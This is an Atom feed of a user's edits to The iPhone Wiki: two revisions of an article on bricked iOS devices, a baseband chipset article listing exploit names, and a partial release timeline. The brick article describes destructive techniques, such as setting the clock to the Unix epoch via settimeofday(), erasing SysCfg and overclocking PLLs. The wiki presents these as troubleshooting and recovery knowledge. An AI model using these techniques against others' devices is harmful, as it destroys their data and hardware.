<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="en">
	<id>https://www.theiphonewiki.com/w/api.php?action=feedcontributions&amp;feedformat=atom&amp;user=Inflatable+Man</id>
	<title>The iPhone Wiki - User contributions [en]</title>
	<link rel="self" type="application/atom+xml" href="https://www.theiphonewiki.com/w/api.php?action=feedcontributions&amp;feedformat=atom&amp;user=Inflatable+Man"/>
	<link rel="alternate" type="text/html" href="https://www.theiphonewiki.com/wiki/Special:Contributions/Inflatable_Man"/>
	<updated>2026-05-12T15:45:25Z</updated>
	<subtitle>User contributions</subtitle>
	<generator>MediaWiki 1.31.14</generator>
	<entry>
		<id>https://www.theiphonewiki.com/w/index.php?title=Brick&amp;diff=114554</id>
		<title>Brick</title>
		<link rel="alternate" type="text/html" href="https://www.theiphonewiki.com/w/index.php?title=Brick&amp;diff=114554"/>
		<updated>2021-07-12T02:53:28Z</updated>

		<summary type="html">&lt;p&gt;Inflatable Man: /* Changing the system time to the Unix epoch */ Added that a process needs to be unsandboxed to use the settimeofday() syscall&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;A '''bricked''' device is a device that does not work. The direct metaphorical meaning is that the device is permanently damaged (making it as useless as a brick), but people use the term &amp;quot;bricked&amp;quot; for non-working conditions which range from easy to fix (such as a failed update) to impossible to fix (such as damaged baseband memory). A phone may be called &amp;quot;bricked&amp;quot; if it will not boot, will not respond to input, will not make calls, etc.&lt;br /&gt;
&lt;br /&gt;
== Difficulty of bricking an iOS device ==&lt;br /&gt;
&lt;br /&gt;
Using a jailbreaking tool cannot put a device into an unusable state on its own - if something goes wrong while jailbreaking, putting the device into [[DFU Mode]] will allow you to restore it via iTunes. Installing software via Cydia also cannot cause an unrecoverable state (unless very specifically designed to do so by a malicious person, which has not been seen &amp;quot;in the wild&amp;quot;). Other than that specific exception, if something goes wrong, DFU mode will still work.&lt;br /&gt;
&lt;br /&gt;
== Types of &amp;quot;bricking&amp;quot; that can be easily fixed (not really &amp;quot;bricking&amp;quot;) ==&lt;br /&gt;
&lt;br /&gt;
=== Installing stock iOS on a device with a preserved baseband ===&lt;br /&gt;
&lt;br /&gt;
Early unlock solutions could result in unusable (but recoverable) phones after installing an iOS update if you didn't take special steps. For people who used [[redsn0w]] to install the iPad baseband ([[06.15.00]]) on a compatible iPhone 3G or iPhone 3GS so that they could use [[ultrasn0w]] to carrier unlock it, upgrading or restoring iOS using &amp;quot;stock&amp;quot; (normal) IPSWs would make the phone unusable - until you made and restored a &amp;quot;custom&amp;quot; IPSW without a baseband update ([http://www.jailbreakqa.com/faq#32532 instructions]), and then reinstalled the iPad baseband using redsn0w. Avoiding doing a stock upgrade/restore (upgrading or restoring iOS using a &amp;quot;custom&amp;quot; IPSW) avoided this problem.&lt;br /&gt;
&lt;br /&gt;
=== Intentionally modifying key parts of iOS: changing NVRAM variables to invalid values ===&lt;br /&gt;
&lt;br /&gt;
In February 2015, [http://dayt0n.github.io/articles/dclr-override/ researchers released information] about how to change an [[NOR (NVRAM)|nvram]] variable called &amp;lt;code&amp;gt;DClr_override&amp;lt;/code&amp;gt;. If this is changed to an invalid value for the device (valid values are not the same on all devices), and the device is rebooted, the device will not be able to boot. iOS 8.3 beta 4 (released in March 2015) [https://twitter.com/xerub/status/581744991229374464 removes the DClr_override variable], and later iOS versions will probably omit it as well. This means that restoring a device to iOS 8.3 beta 4 (or later) will fix the device, rendering it bootable once again.&lt;br /&gt;
&lt;br /&gt;
=== Wiping the iBoot Partition ===&lt;br /&gt;
If you wipe the iBoot Partition, It will render the device unbootable. An easy way to do this is flash an [[InternalUI Builds|Internal UI Build]] and go to Settings/Internal Settings/CoreOS and press &amp;quot;Brick Device&amp;quot;. This will wipe the iBoot Partition, along with the firmware. This is recoverable by restoring the device, as the device will be in DFU mode.&lt;br /&gt;
&lt;br /&gt;
== Types of bricking that may be hard to fix ==&lt;br /&gt;
&lt;br /&gt;
=== Changing MAC address to invalid address ===&lt;br /&gt;
&lt;br /&gt;
If you change your device's MAC address to something invalid (for example if you're attempting to change your [[UDID]]), your internet won't work again until you fix the MAC address (using MobileTerminal or similar). This persists even if you restore -- so you can make this really really hard to fix if you restore and there's no jailbreak available, if the available jailbreaks don't include afc2 and other workarounds aren't working, etc. [http://www.jailbreakqa.com/questions/277646/stuck-after-mac-address-change-can-i-revive-it Here's a JailbreakQA thread about this] and [http://www.jailbreakqa.com/questions/211048/how-to-install-afc2add-without-using-wi-fi-in-a-jailbroken-ipad-3-with-704 another one].&lt;br /&gt;
&lt;br /&gt;
=== Intentionally modifying key parts of iOS: other ways ===&lt;br /&gt;
&lt;br /&gt;
If you purposefully erase / zero out your [[NOR]], then you will have trouble doing a DFU restore because important information from the [[NOR (SysCfg)|SysCfg]] section will not be available.&lt;br /&gt;
&lt;br /&gt;
[http://www.reddit.com/r/jailbreak/comments/1m3jo6/how_much_torture_kernel_user_based_etc_would_it/cc5g8nj See winocm's explanation of several related ways to brick a device]:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;blockquote&amp;gt;&lt;br /&gt;
* Erase SysCfg/replace it with 0xFFs.&lt;br /&gt;
* Destroy the 'SrNm' tag in the SysCfg, it won't activate then.&lt;br /&gt;
* Set all clock gates enabled and set PLL frequencies to mad numbers, THIS WILL DAMAGE THE HARDWARE.&lt;br /&gt;
* Run constant NAND stress tests to wear out NAND pages.&lt;br /&gt;
* Set the 'display-timing' nvram variable to some other garbage. iPod touch (2nd generation)/(3rd generation) does weird things with that.&lt;br /&gt;
&lt;br /&gt;
If you know how the hardware works, this can be done from an iBoot/kernel level.&lt;br /&gt;
&amp;lt;/blockquote&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Installing certain [[Internal Firmware]]s on the wrong devices ===&lt;br /&gt;
If you install certain factory firmwares on certain devices, the devices may be bricked permanently.&lt;br /&gt;
Examples are installing [[HoodooYabuli 9B3176n]] on an iPad 1, or installing [[ApexNanshan 8A2180g]] on a iPhone 3G. This may be due to NVRAM.&lt;br /&gt;
&lt;br /&gt;
=== Making the wrong modifications to the baseband ===&lt;br /&gt;
&lt;br /&gt;
One way to irreversibly brick a device in software is to flash an invalid [[Baseband Bootloader|baseband bootloader]], provided it has a baseband. Most other bad flash scenarios are recoverable some way or another. &lt;br /&gt;
&lt;br /&gt;
Another way to brick the baseband is by installing baseband [[06.15.00]] on an incompatible device. [[redsn0w]] has an option to install this baseband on the [[N82AP|iPhone 3G]] or [[N88AP|iPhone 3GS]] in order to get a baseband version that is unlockable with [[ultrasn0w]]. This is a nice way to get an unlock, because the [[K48AP|iPad]], the [[N82AP|iPhone 3G]] and the [[N88AP|iPhone 3GS]] all share the same [[Baseband Device]], but the [[K48AP|iPad]] has a newer version number in its baseband. That way people can actually downgrade by installing a higher version (there are no [[APTicket]] checks in these devices). This has known side effects, like losing [[GPS]] functionality (this baseband comes from an iPad, which has a different GPS module).&lt;br /&gt;
&lt;br /&gt;
It was possible to brick an [[N88AP|iPhone 3GS]] with this method. In fall 2011, Apple replaced the [[NOR]] flash, which rendered the aforementioned 06.15.00 trick useless. The previous type of NOR was marked 36MY1EE, and they switched to 36MY1EG and 36MY1EH. These new [[NOR]] flash chips seem to work with the newer baseband versions in the [[N88AP|iPhone 3GS]], but are not supported with the old [[06.15.00]] baseband. Therefore installing this version will brick your device if you have a newer [[NOR]] flash, as you (currently) cannot go back and install anything else. To check before installation, you can try checking the serial number, which reveals the production year/week in the first 3-5 digits. 2011 week 34 appears safe, while weeks 35 and 36 seem iffy, and week 37 is not safe. Ultimately, the most sure-fire way would be to open the device and check the chip type.&lt;br /&gt;
&lt;br /&gt;
=== Changing the system time to the Unix epoch ===&lt;br /&gt;
&lt;br /&gt;
Setting the system time to the Unix epoch (January 1, 1970) and attempting to reboot the device almost irreversibly bricks it. Normally, without a jailbreak, setting the time like this isn't possible with the Settings app, although it used to be possible before iOS 9.3.1. However, as the root user or with the com.apple.timed key set to &amp;quot;YES&amp;quot; in an executable's entitlements, using the settimeofday() system call in unsandboxed software allows the system time to be changed to the Unix epoch by setting tv_sec and tv_usec in a timeval struct (which is passed as the first argument) to 0. When the device attempts to boot with the time set, it will fail to boot. This cannot be fixed normally with [[Recovery Mode]] or [[DFU Mode]]. Disconnecting and then reconnecting the battery resets the time which fixes this. Another way to fix this, is by waiting for the battery to fully deplete, which also resets the time.&lt;/div&gt;</summary>
		<author><name>Inflatable Man</name></author>
		
	</entry>
	<entry>
		<id>https://www.theiphonewiki.com/w/index.php?title=Brick&amp;diff=114553</id>
		<title>Brick</title>
		<link rel="alternate" type="text/html" href="https://www.theiphonewiki.com/w/index.php?title=Brick&amp;diff=114553"/>
		<updated>2021-07-12T02:45:19Z</updated>

		<summary type="html">&lt;p&gt;Inflatable Man: /* Types of bricking that may be hard to fix */ Added another way to brick the device&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;A '''bricked''' device is a device that does not work. The direct metaphorical meaning is that the device is permanently damaged (making it as useless as a brick), but people use the term &amp;quot;bricked&amp;quot; for non-working conditions which range from easy to fix (such as a failed update) to impossible to fix (such as damaged baseband memory). A phone may be called &amp;quot;bricked&amp;quot; if it will not boot, will not respond to input, will not make calls, etc.&lt;br /&gt;
&lt;br /&gt;
== Difficulty of bricking an iOS device ==&lt;br /&gt;
&lt;br /&gt;
Using a jailbreaking tool cannot put a device into an unusable state on its own - if something goes wrong while jailbreaking, putting the device into [[DFU Mode]] will allow you to restore it via iTunes. Installing software via Cydia also cannot cause an unrecoverable state (unless very specifically designed to do so by a malicious person, which has not been seen &amp;quot;in the wild&amp;quot;). Other than that specific exception, if something goes wrong, DFU mode will still work.&lt;br /&gt;
&lt;br /&gt;
== Types of &amp;quot;bricking&amp;quot; that can be easily fixed (not really &amp;quot;bricking&amp;quot;) ==&lt;br /&gt;
&lt;br /&gt;
=== Installing stock iOS on a device with a preserved baseband ===&lt;br /&gt;
&lt;br /&gt;
Early unlock solutions could result in unusable (but recoverable) phones after installing an iOS update if you didn't take special steps. For people who used [[redsn0w]] to install the iPad baseband ([[06.15.00]]) on a compatible iPhone 3G or iPhone 3GS so that they could use [[ultrasn0w]] to carrier unlock it, upgrading or restoring iOS using &amp;quot;stock&amp;quot; (normal) IPSWs would make the phone unusable - until you made and restored a &amp;quot;custom&amp;quot; IPSW without a baseband update ([http://www.jailbreakqa.com/faq#32532 instructions]), and then reinstalled the iPad baseband using redsn0w. Avoiding doing a stock upgrade/restore (upgrading or restoring iOS using a &amp;quot;custom&amp;quot; IPSW) avoided this problem.&lt;br /&gt;
&lt;br /&gt;
=== Intentionally modifying key parts of iOS: changing NVRAM variables to invalid values ===&lt;br /&gt;
&lt;br /&gt;
In February 2015, [http://dayt0n.github.io/articles/dclr-override/ researchers released information] about how to change an [[NOR (NVRAM)|nvram]] variable called &amp;lt;code&amp;gt;DClr_override&amp;lt;/code&amp;gt;. If this is changed to an invalid value for the device (valid values are not the same on all devices), and the device is rebooted, the device will not be able to boot. iOS 8.3 beta 4 (released in March 2015) [https://twitter.com/xerub/status/581744991229374464 removes the DClr_override variable], and later iOS versions will probably omit it as well. This means that restoring a device to iOS 8.3 beta 4 (or later) will fix the device, rendering it bootable once again.&lt;br /&gt;
&lt;br /&gt;
=== Wiping the iBoot Partition ===&lt;br /&gt;
If you wipe the iBoot Partition, It will render the device unbootable. An easy way to do this is flash an [[InternalUI Builds|Internal UI Build]] and go to Settings/Internal Settings/CoreOS and press &amp;quot;Brick Device&amp;quot;. This will wipe the iBoot Partition, along with the firmware. This is recoverable by restoring the device, as the device will be in DFU mode.&lt;br /&gt;
&lt;br /&gt;
== Types of bricking that may be hard to fix ==&lt;br /&gt;
&lt;br /&gt;
=== Changing MAC address to invalid address ===&lt;br /&gt;
&lt;br /&gt;
If you change your device's MAC address to something invalid (for example if you're attempting to change your [[UDID]]), your internet won't work again until you fix the MAC address (using MobileTerminal or similar). This persists even if you restore -- so you can make this really really hard to fix if you restore and there's no jailbreak available, if the available jailbreaks don't include afc2 and other workarounds aren't working, etc. [http://www.jailbreakqa.com/questions/277646/stuck-after-mac-address-change-can-i-revive-it Here's a JailbreakQA thread about this] and [http://www.jailbreakqa.com/questions/211048/how-to-install-afc2add-without-using-wi-fi-in-a-jailbroken-ipad-3-with-704 another one].&lt;br /&gt;
&lt;br /&gt;
=== Intentionally modifying key parts of iOS: other ways ===&lt;br /&gt;
&lt;br /&gt;
If you purposefully erase / zero out your [[NOR]], then you will have trouble doing a DFU restore because important information from the [[NOR (SysCfg)|SysCfg]] section will not be available.&lt;br /&gt;
&lt;br /&gt;
[http://www.reddit.com/r/jailbreak/comments/1m3jo6/how_much_torture_kernel_user_based_etc_would_it/cc5g8nj See winocm's explanation of several related ways to brick a device]:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;blockquote&amp;gt;&lt;br /&gt;
* Erase SysCfg/replace it with 0xFFs.&lt;br /&gt;
* Destroy the 'SrNm' tag in the SysCfg, it won't activate then.&lt;br /&gt;
* Set all clock gates enabled and set PLL frequencies to mad numbers, THIS WILL DAMAGE THE HARDWARE.&lt;br /&gt;
* Run constant NAND stress tests to wear out NAND pages.&lt;br /&gt;
* Set the 'display-timing' nvram variable to some other garbage. iPod touch (2nd generation)/(3rd generation) does weird things with that.&lt;br /&gt;
&lt;br /&gt;
If you know how the hardware works, this can be done from an iBoot/kernel level.&lt;br /&gt;
&amp;lt;/blockquote&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Installing certain [[Internal Firmware]]s on the wrong devices ===&lt;br /&gt;
If you install certain factory firmwares on certain devices, the devices may be bricked permanently.&lt;br /&gt;
Examples are installing [[HoodooYabuli 9B3176n]] on an iPad 1, or installing [[ApexNanshan 8A2180g]] on a iPhone 3G. This may be due to NVRAM.&lt;br /&gt;
&lt;br /&gt;
=== Making the wrong modifications to the baseband ===&lt;br /&gt;
&lt;br /&gt;
One way to irreversibly brick a device in software is to flash an invalid [[Baseband Bootloader|baseband bootloader]], provided it has a baseband. Most other bad flash scenarios are recoverable some way or another. &lt;br /&gt;
&lt;br /&gt;
Another way to brick the baseband is by installing baseband [[06.15.00]] on an incompatible device. [[redsn0w]] has an option to install this baseband on the [[N82AP|iPhone 3G]] or [[N88AP|iPhone 3GS]] in order to get a baseband version that is unlockable with [[ultrasn0w]]. This is a nice way to get an unlock, because the [[K48AP|iPad]], the [[N82AP|iPhone 3G]] and the [[N88AP|iPhone 3GS]] all share the same [[Baseband Device]], but the [[K48AP|iPad]] has a newer version number in its baseband. That way people can actually downgrade by installing a higher version (there are no [[APTicket]] checks in these devices). This has known side effects, like losing [[GPS]] functionality (this baseband comes from an iPad, which has a different GPS module).&lt;br /&gt;
&lt;br /&gt;
It was possible to brick an [[N88AP|iPhone 3GS]] with this method. In fall 2011, Apple replaced the [[NOR]] flash, which rendered the aforementioned 06.15.00 trick useless. The previous type of NOR was marked 36MY1EE, and they switched to 36MY1EG and 36MY1EH. These new [[NOR]] flash chips seem to work with the newer baseband versions in the [[N88AP|iPhone 3GS]], but are not supported with the old [[06.15.00]] baseband. Therefore installing this version will brick your device if you have a newer [[NOR]] flash, as you (currently) cannot go back and install anything else. To check before installation, you can try checking the serial number, which reveals the production year/week in the first 3-5 digits. 2011 week 34 appears safe, while weeks 35 and 36 seem iffy, and week 37 is not safe. Ultimately, the most sure-fire way would be to open the device and check the chip type.&lt;br /&gt;
&lt;br /&gt;
=== Changing the system time to the Unix epoch ===&lt;br /&gt;
&lt;br /&gt;
Setting the system time to the Unix epoch (January 1, 1970) and attempting to reboot the device almost irreversibly bricks it. Normally, without a jailbreak, setting the time like this isn't possible with the Settings app, although it used to be possible before iOS 9.3.1. However, as the root user or with the com.apple.timed key set to &amp;quot;YES&amp;quot; in an executable's entitlements, using the settimeofday() system call allows the system time to be changed to the Unix epoch by setting tv_sec and tv_usec in a timeval struct (which is passed as the first argument) to 0. When the device attempts to boot with the time set, it will fail to boot. This cannot be fixed normally with [[Recovery Mode]] or [[DFU Mode]]. Disconnecting and then reconnecting the battery resets the time which fixes this. Another way to fix this, is by waiting for the battery to fully deplete, which also resets the time.&lt;/div&gt;</summary>
		<author><name>Inflatable Man</name></author>
		
	</entry>
	<entry>
		<id>https://www.theiphonewiki.com/w/index.php?title=Baseband_Device&amp;diff=114552</id>
		<title>Baseband Device</title>
		<link rel="alternate" type="text/html" href="https://www.theiphonewiki.com/w/index.php?title=Baseband_Device&amp;diff=114552"/>
		<updated>2021-07-11T23:22:26Z</updated>

		<summary type="html">&lt;p&gt;Inflatable Man: Capitalized &amp;quot;it&amp;quot;&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;the '''Baseband Device''' is the chipset that all [[iPhone|iPhones]] and cellular models of the [[Apple Watch]], [[iPad]], [[List_of_iPad_Airs|iPad Air]], [[List_of_iPad_minis|iPad mini]], and [[iPad Pro]] use that manages all the functions which require a cellular antenna. It has its own RAM and Firmware in NOR flash, separate from the [[ARM]] core resources. The baseband is a resource to the OS. The Wi-Fi and Bluetooth are managed by the main CPU, although the baseband stores it's MAC addresses in its NVRAM.&lt;br /&gt;
&lt;br /&gt;
See also: [[Baseband Commands]] and [[iOS Baseband Tools]].&lt;br /&gt;
==Device List==&lt;br /&gt;
&amp;lt;onlyinclude&amp;gt; &amp;lt;!-- Do not remove this tag, it is used as part of the main page transclution! --&amp;gt;&lt;br /&gt;
=====[[PMB8876]] S-Gold 2=====&lt;br /&gt;
* [[M68AP|iPhone]]&lt;br /&gt;
&lt;br /&gt;
=====[[PMB8878]] X-Gold 608=====&lt;br /&gt;
* [[K48AP|iPad]]&lt;br /&gt;
* [[N82AP|iPhone 3G]]&lt;br /&gt;
* [[N88AP|iPhone 3GS]]&lt;br /&gt;
&lt;br /&gt;
=====[[XMM 6180]] X-Gold 618=====&lt;br /&gt;
* iPad 2 [[K94AP|(iPad2,2)]]&lt;br /&gt;
* iPhone 4 [[N90AP|(iPhone3,1)]] and [[N90BAP|(iPhone3,2)]]&lt;br /&gt;
&lt;br /&gt;
=====[[MDM6600]]=====&lt;br /&gt;
* iPad 2 [[K95AP|(iPad2,3)]]&lt;br /&gt;
* iPhone 4 [[N92AP|(iPhone3,3)]]&lt;br /&gt;
&lt;br /&gt;
=====[[MDM6610]]=====&lt;br /&gt;
* [[iPhone 4S]]&lt;br /&gt;
&lt;br /&gt;
=====[[MDM9600]]=====&lt;br /&gt;
* [[iPad (3rd generation)]]&lt;br /&gt;
&lt;br /&gt;
=====[[MDM9615]]=====&lt;br /&gt;
* [[iPad (4th generation)]]&lt;br /&gt;
* [[iPad Air]]&lt;br /&gt;
* [[iPad mini]]&lt;br /&gt;
* [[iPad mini 2]]&lt;br /&gt;
* [[iPad mini 3]]&lt;br /&gt;
* [[iPhone 5]]&lt;br /&gt;
* [[iPhone 5c]]&lt;br /&gt;
* [[iPhone 5s]]&lt;br /&gt;
&lt;br /&gt;
=====[[MDM9625]]=====&lt;br /&gt;
* [[iPad (5th generation)]]&lt;br /&gt;
* [[iPad Air 2]]&lt;br /&gt;
* [[iPad Pro (12.9-inch)]]&lt;br /&gt;
* [[iPad mini 4]]&lt;br /&gt;
* [[iPhone 6]]&lt;br /&gt;
* [[iPhone 6 Plus]]&lt;br /&gt;
* [[iPhone SE (1st generation)]]&lt;br /&gt;
&lt;br /&gt;
=====[[MDM9635]]=====&lt;br /&gt;
* [[Apple Watch Series 3]]&lt;br /&gt;
* [[iPad (6th generation)]]&lt;br /&gt;
* [[iPad Pro (9.7-inch)]]&lt;br /&gt;
* [[iPhone 6s]]&lt;br /&gt;
* [[iPhone 6s Plus]]&lt;br /&gt;
&lt;br /&gt;
=====[[MDM9645]]=====&lt;br /&gt;
* [[iPad Pro (10.5-inch)]]&lt;br /&gt;
* [[iPad Pro (12.9-inch) (2nd generation)]]&lt;br /&gt;
* [[iPhone 7]]&lt;br /&gt;
* [[iPhone 7 Plus]]&lt;br /&gt;
&lt;br /&gt;
=====[[PMB9943]] X-Gold 736=====&lt;br /&gt;
* [[iPhone 7]]&lt;br /&gt;
* [[iPhone 7 Plus]]&lt;br /&gt;
&lt;br /&gt;
=====[[MDM9655]]=====&lt;br /&gt;
* [[iPhone 8]]&lt;br /&gt;
* [[iPhone 8 Plus]]&lt;br /&gt;
* [[iPhone X]]&lt;br /&gt;
&lt;br /&gt;
=====[[PMB9948]] X-Gold 748=====&lt;br /&gt;
* [[iPhone 8]]&lt;br /&gt;
* [[iPhone 8 Plus]]&lt;br /&gt;
* [[iPhone X]]&lt;br /&gt;
&lt;br /&gt;
=====[[PMB9955]] X-Gold 756=====&lt;br /&gt;
* [[Apple Watch Series 4]]&lt;br /&gt;
* [[Apple Watch Series 5]]&lt;br /&gt;
* [[Apple Watch SE]]&lt;br /&gt;
* [[Apple Watch Series 6]]&lt;br /&gt;
* [[iPad (7th generation)]]&lt;br /&gt;
* [[iPad (8th generation)]]&lt;br /&gt;
* [[iPad Air (3rd generation)]]&lt;br /&gt;
* [[iPad Pro (11-inch)]]&lt;br /&gt;
* [[iPad Pro (12.9-inch) (3rd generation)]]&lt;br /&gt;
* [[iPad mini (5th generation)]]&lt;br /&gt;
* [[iPhone XR]]&lt;br /&gt;
* [[iPhone XS]]&lt;br /&gt;
* [[iPhone XS Max]]&lt;br /&gt;
&lt;br /&gt;
=====[[PMB9960]] X-Gold 766=====&lt;br /&gt;
* [[iPad Air (4th generation)]]&lt;br /&gt;
* [[iPad Pro (11-inch) (2nd generation)]]&lt;br /&gt;
* [[iPad Pro (12.9-inch) (4th generation)]]&lt;br /&gt;
* [[iPhone 11]]&lt;br /&gt;
* [[iPhone 11 Pro]]&lt;br /&gt;
* [[iPhone 11 Pro Max]]&lt;br /&gt;
* [[iPhone SE (2nd generation)]]&lt;br /&gt;
&lt;br /&gt;
=====[[SDX55M]]=====&lt;br /&gt;
* [[iPad Pro (11-inch) (3rd generation)]]&lt;br /&gt;
* [[iPad Pro (12.9-inch) (5th generation)]]&lt;br /&gt;
* [[iPhone 12 mini]]&lt;br /&gt;
* [[iPhone 12]]&lt;br /&gt;
* [[iPhone 12 Pro]]&lt;br /&gt;
* [[iPhone 12 Pro Max]]&lt;br /&gt;
&amp;lt;/onlyinclude&amp;gt; &amp;lt;!-- Do not remove this tag, it is used as part of the main page transclution! --&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==[[Seczone]]==&lt;br /&gt;
This is the area in the baseband where the lock state is stored.&lt;br /&gt;
&lt;br /&gt;
===Layout===&lt;br /&gt;
 0x400--NCK token&lt;br /&gt;
 0xA00--IMEI signature&lt;br /&gt;
 0xB00--IMEI&lt;br /&gt;
 0xC00--Locks table&lt;br /&gt;
&lt;br /&gt;
===Encryption===&lt;br /&gt;
Many of the sections are encrypted using [[Baseband TEA Keys|TEA]] based off the [[CHIPID]] and [[NORID]]. See [[NCK Brute Force]] for more info.&lt;br /&gt;
&lt;br /&gt;
==Exploits==&lt;br /&gt;
* [[SIM hacks]]&lt;br /&gt;
&lt;br /&gt;
===[[PMB8876]] S-Gold 2===&lt;br /&gt;
* [[Fakeblank]]&lt;br /&gt;
* [[IPSF]]&lt;br /&gt;
* [[Minus 0x400]]&lt;br /&gt;
* [[Minus 0x20000 with Back Extend Erase]]&lt;br /&gt;
&lt;br /&gt;
===[[PMB8878]] X-Gold 608=== &lt;br /&gt;
* [[JerrySIM]]&lt;br /&gt;
* [[AT+stkprof]]&lt;br /&gt;
* [[AT+XLOG Vulnerability]]&lt;br /&gt;
* [[AT+XEMN Heap Overflow]]&lt;br /&gt;
* [[AT+XAPP Vulnerability]]&lt;br /&gt;
* [[AT+FNS]]&lt;br /&gt;
&lt;br /&gt;
===[[XMM 6180]] X-Gold 618===&lt;br /&gt;
* [[AT+XAPP Vulnerability]]&lt;br /&gt;
&lt;br /&gt;
===[[MDM6600]]===&lt;br /&gt;
* None&lt;br /&gt;
&lt;br /&gt;
===[[MDM6610]]===&lt;br /&gt;
* None&lt;br /&gt;
&lt;br /&gt;
===[[MDM9600]]===&lt;br /&gt;
* None&lt;br /&gt;
&lt;br /&gt;
===[[MDM9615]]===&lt;br /&gt;
* None&lt;br /&gt;
&lt;br /&gt;
===[[MDM9625]]===&lt;br /&gt;
* None&lt;br /&gt;
&lt;br /&gt;
===[[MDM9635]]===&lt;br /&gt;
* None&lt;br /&gt;
&lt;br /&gt;
===[[MDM9645]]===&lt;br /&gt;
* None&lt;br /&gt;
&lt;br /&gt;
===[[PMB9943]] X-Gold 736===&lt;br /&gt;
* None&lt;br /&gt;
&lt;br /&gt;
===[[MDM9655]]===&lt;br /&gt;
* None&lt;br /&gt;
&lt;br /&gt;
===[[PMB9948]] X-Gold 748=== &lt;br /&gt;
* None&lt;br /&gt;
&lt;br /&gt;
===[[PMB9955]] X-Gold 756===&lt;br /&gt;
* None&lt;br /&gt;
&lt;br /&gt;
===[[PMB9960]] X-Gold 766===&lt;br /&gt;
* None&lt;br /&gt;
&lt;br /&gt;
===[[SDX55M]]===&lt;br /&gt;
* None&lt;br /&gt;
&lt;br /&gt;
==Theoretical Attacks==&lt;br /&gt;
* [[NCK Brute Force]]&lt;br /&gt;
* [[Baseband JTAG]]&lt;br /&gt;
&lt;br /&gt;
==Boot Chain==&lt;br /&gt;
[[Baseband Bootrom|bootrom]]-&amp;gt;[[Baseband Bootloader|bootloader]]-&amp;gt;[[Baseband Firmware|firmware]]&lt;br /&gt;
&lt;br /&gt;
[[Category:Baseband]]&lt;/div&gt;</summary>
		<author><name>Inflatable Man</name></author>
		
	</entry>
	<entry>
		<id>https://www.theiphonewiki.com/w/index.php?title=Timeline&amp;diff=114072</id>
		<title>Timeline</title>
		<link rel="alternate" type="text/html" href="https://www.theiphonewiki.com/w/index.php?title=Timeline&amp;diff=114072"/>
		<updated>2021-06-12T19:50:51Z</updated>

		<summary type="html">&lt;p&gt;Inflatable Man: /* 2021 */ Added the new versions from WWDC to the timeline&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;{{float toc|right}}&lt;br /&gt;
{{see also|The iPhone Wiki:Current events}}&lt;br /&gt;
== 2021 ==&lt;br /&gt;
== June ==&lt;br /&gt;
* 7 June -- iOS/iPadOS 15 beta 1, tvOS 15, and watchOS 8 released.&lt;br /&gt;
&lt;br /&gt;
=== May ===&lt;br /&gt;
* 3 May -- macOS 11.3.1, iOS/iPadOS 14.5.1, 12.5.3 and watchOS 7.4.1 released.&lt;br /&gt;
&lt;br /&gt;
=== April ===&lt;br /&gt;
* 30 April -- audioOS 14.6 beta 2, iOS/iPadOS 14.6 beta 2, tvOS 14.6 beta 2 and watchOS 7.5 beta 2 released.&lt;br /&gt;
* 26 April -- macOS 11.3, bridgeOS 5.3, audioOS 14.5, iOS/iPadOS 14.5, tvOS 14.5, Apple TV Software Update 7.6.3 and watchOS 7.4 released.&lt;br /&gt;
* 22 April -- audioOS 14.6 beta, iOS/iPadOS 14.6 beta, tvOS 14.6 beta and watchOS 7.5 beta released.&lt;br /&gt;
* 21 April -- macOS 11.4 beta released.&lt;br /&gt;
* 20 April -- [[J305AP|Apple TV 4K (2nd generation)]], [[AirTags]], [[iPad Pro (11-inch) (3rd generation)]], [[iPad Pro (12.9-inch) (5th generation)]] and [[iMac (24-inch, M1, 2021)]] announced. macOS 11.3 [[Release Candidate|RC]], audioOS 14.5 [[Release Candidate|RC]], iOS/iPadOS 14.5 [[Release Candidate|RC]], tvOS 14.5 [[Release Candidate|RC]] and watchOS 7.4 [[Release Candidate|RC]] released.&lt;br /&gt;
* 13 April -- macOS 11.3 beta 8 and iOS/iPadOS 14.5 beta 8 released.&lt;br /&gt;
* 8 April -- macOS 11.3 beta 7 released.&lt;br /&gt;
* 7 April -- audioOS 14.5 beta 7, iOS/iPadOS 14.5 beta 7, tvOS 14.5 beta 7 and watchOS 7.4 beta 7 released.&lt;br /&gt;
* 1 April -- [[Taurine]] released with support for iOS/iPadOS 14.0-14.3.&lt;br /&gt;
&lt;br /&gt;
=== March ===&lt;br /&gt;
* 31 March -- macOS 11.3 beta 6, audioOS 14.5 beta 6, iOS/iPadOS 14.5 beta 6, watchOS 7.4 beta 6 and tvOS 14.5 beta 6 released.&lt;br /&gt;
* 26 March -- iOS/iPadOS 12.5.2, 14.4.2 and watchOS 7.3.3 released.&lt;br /&gt;
* 23 March -- macOS 11.3 beta 5, audioOS 14.5 beta 5, iOS/iPadOS 14.5 beta 5, watchOS 7.4 beta 5 and tvOS 14.5 beta 5 released.&lt;br /&gt;
* 16 March -- [[kok3shi]] released to jailbreak 64-bit devices running iOS 9.3.2 - 9.3.5.&lt;br /&gt;
* 15 March -- macOS 11.3 beta 4, audioOS 14.5 beta 4, iOS/iPadOS 14.5 beta 4, watchOS 7.4 beta 4 and tvOS 14.5 beta 4 released.&lt;br /&gt;
* 9 March -- macOS 11.2.3, iOS/iPadOS 14.4.1 and watchOS 7.3.2 released.&lt;br /&gt;
* 4 March -- watchOS 7.4 beta 3 released.&lt;br /&gt;
* 3 March -- audioOS 14.5 beta 3 and tvOS 14.5 beta 3 released.&lt;br /&gt;
* 2 March -- macOS 11.3 beta 3 and iOS/iPadOS 14.5 beta 3 released.&lt;br /&gt;
&lt;br /&gt;
=== February ===&lt;br /&gt;
* 28 February -- [[unc0ver]] updated to version 6.0.0, which add support for iOS 12.4.9-12.5.1, 13.5.1-13.7 and 14.0-14.3.&lt;br /&gt;
* 25 February -- macOS 11.2.2 released.&lt;br /&gt;
* 17 February -- macOS 11.3 beta 2 released.&lt;br /&gt;
* 16 February -- iOS/iPadOS 14.5 beta 2, tvOS 14.5 beta 2, and watchOS 7.4 beta 2 released.&lt;br /&gt;
